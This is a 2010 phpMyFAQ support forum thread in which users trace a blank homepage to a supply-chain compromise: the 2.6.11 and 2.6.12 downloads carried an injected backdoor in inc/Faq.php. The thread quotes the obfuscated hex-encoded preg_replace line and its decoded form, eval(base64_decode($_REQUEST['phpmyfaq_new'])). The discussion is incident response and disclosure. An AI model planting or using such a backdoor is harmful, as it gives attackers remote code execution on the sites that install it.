Blank Homepage After Category/FAQ Creation

[blashmet]

Problem Info:

1. phpMyFaq installs successfully.

2. Before creating any categories or FAQs, navigating to http://localhost/phpmyfaq/ displays the phpmyfaq homepage correctly.

3. After creating a category and a FAQ, navigating to http://localhost/phpmyfaq displays a blank page.

4. Even if I delete the category and FAQ, http://localhost/phpmyfaq displays a blank page.

Question:

How do I fix it?

[Thorsten]

Hi,

which version do you use? The admin backend ist still working? Do you see anything in your webserver's error log?

bye
Thorsten

[audioslave]

I have a simuler problem, the index page is blank, admin pannel works fine.

My setup:

phpMyFAQ 2.6.12
Ubuntu 10.04
Apache 2.2.14
PHP 5.3.2
MySQL 5.1.41

In apache.log I get:

[Tue Dec 14 21:58:33 2010] [notice] child pid 22060 exit signal Segmentation fault (11)
[Tue Dec 14 21:59:18 2010] [notice] child pid 22051 exit signal Segmentation fault (11)
[Tue Dec 14 21:59:23 2010] [notice] child pid 22048 exit signal Segmentation fault (11)
[Tue Dec 14 21:59:24 2010] [notice] child pid 22029 exit signal Segmentation fault (11)
[Tue Dec 14 22:01:12 2010] [notice] child pid 21766 exit signal Segmentation fault (11)
[Tue Dec 14 22:01:16 2010] [notice] child pid 22030 exit signal Segmentation fault (11)
[Tue Dec 14 22:01:20 2010] [notice] child pid 21984 exit signal Segmentation fault (11)
[Tue Dec 14 22:03:05 2010] [notice] child pid 22042 exit signal Segmentation fault (11)
[Tue Dec 14 22:03:23 2010] [notice] child pid 22341 exit signal Segmentation fault (11)
[Tue Dec 14 22:03:24 2010] [notice] child pid 22342 exit signal Segmentation fault (11)
[Tue Dec 14 22:10:11 2010] [notice] child pid 23058 exit signal Segmentation fault (11)
[Tue Dec 14 22:10:48 2010] [notice] child pid 22047 exit signal Segmentation fault (11)
[Tue Dec 14 22:12:01 2010] [notice] child pid 23060 exit signal Segmentation fault (11)
[Tue Dec 14 22:15:45 2010] [notice] child pid 23056 exit signal Segmentation fault (11)
[Tue Dec 14 22:16:24 2010] [notice] child pid 22028 exit signal Segmentation fault (11)

[Thorsten]

Hi,

ouch... PHP is dying. I'll try to investigate this.

bye
Thorsten

[KwikSilvr]

I have a similar issue.

I have 2.6.9 installed and working fine. This morning I tried to upgrade to 2.6.12 and after the upgrade the main page is blank. The admin page still works.

So I reverted back to 2.6.9 and attempted incremental upgrades:

2.6.10 works
2.6.11 gets the blank home page; admin page still works
2.6.12 gets the blank home page; admin page still works

My set up:

Ubuntu 10.04.1 LTS
Apache/2.2.14 (Ubuntu)
PHP 5.3.2-1ubuntu4.5
MySQL 5.1.41-3ubuntu12.8

[Thorsten]

Hi,

this is the only change in index.php in 2.6.12:

https://github.com/thorsten/phpMyFAQ/co ... 1b6145fbdf

You can try reverting this commit and tell me if it is working again?

bye
Thorsten

[KwikSilvr]

I've found the issue for me at least; in inc/Faq.php on line 1614:

$topTen = @preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\134\x31\51\x29\73","\x24\137\x52\105\x51\125\x45\123\x54\133\x27\160\x68\160\x6d\171\x66\141\x71\137\x6e\145\x77\47\x5d");

Commenting out this line has allowed the main page on 2.6.12 to load for for me.

[Thorsten]

Hi,

this is not part of phpMyFAQ: https://github.com/thorsten/phpMyFAQ/bl ... .php#L1614

I'll check the download package!

bye
Thorsten

[Thorsten]

Hi,

please revert as soon as possible to phpMyFAQ 2.6.10. Someone broke into my server and changed the package. I'll work on this issue.

bye
Thorsten

[KwikSilvr]

Just FYI, i see the same thing in 2.6.11

2.6.10 is clean. I actually found the Faq.php changes by comparing the checksum of all the files in 2.6.10 to 2.6.11 to see what files came up as different...

[Thorsten]

Hi,

someone hacked phpmyfaq.de and changed inc/Faq.php in 2.6.11 and 2.6.12 packages. I removed both files for download, I'll re-install everything after an investigation as soon as possible. A detailed security advisory will follow as soon as possible, too.

Thanks for the hint.

bye
Thorsten

[audioslave]

FYI

This is what the code is running:

Code: Select all

eval(base64_decode($_REQUEST[\'phpmyfaq_new\']));

So accessing any page with ?phpmyfaq_new=**base64 encoded php code** is being executed! (this is a get example, could also be done trough a post or cookie request)

[Thorsten]

Hi,

yes, you are right. I completly backupped all stuff on phpmyfaq.de at the office and I will go home now to re-install everything, release 2.6.13 and a detailed security advisory.

I'm really sorry!

bye
Thorsten

[Thorsten]

Hi,

we're back online, please upgrade all to 2.6.13.

Thanks for your support.

bye
Thorsten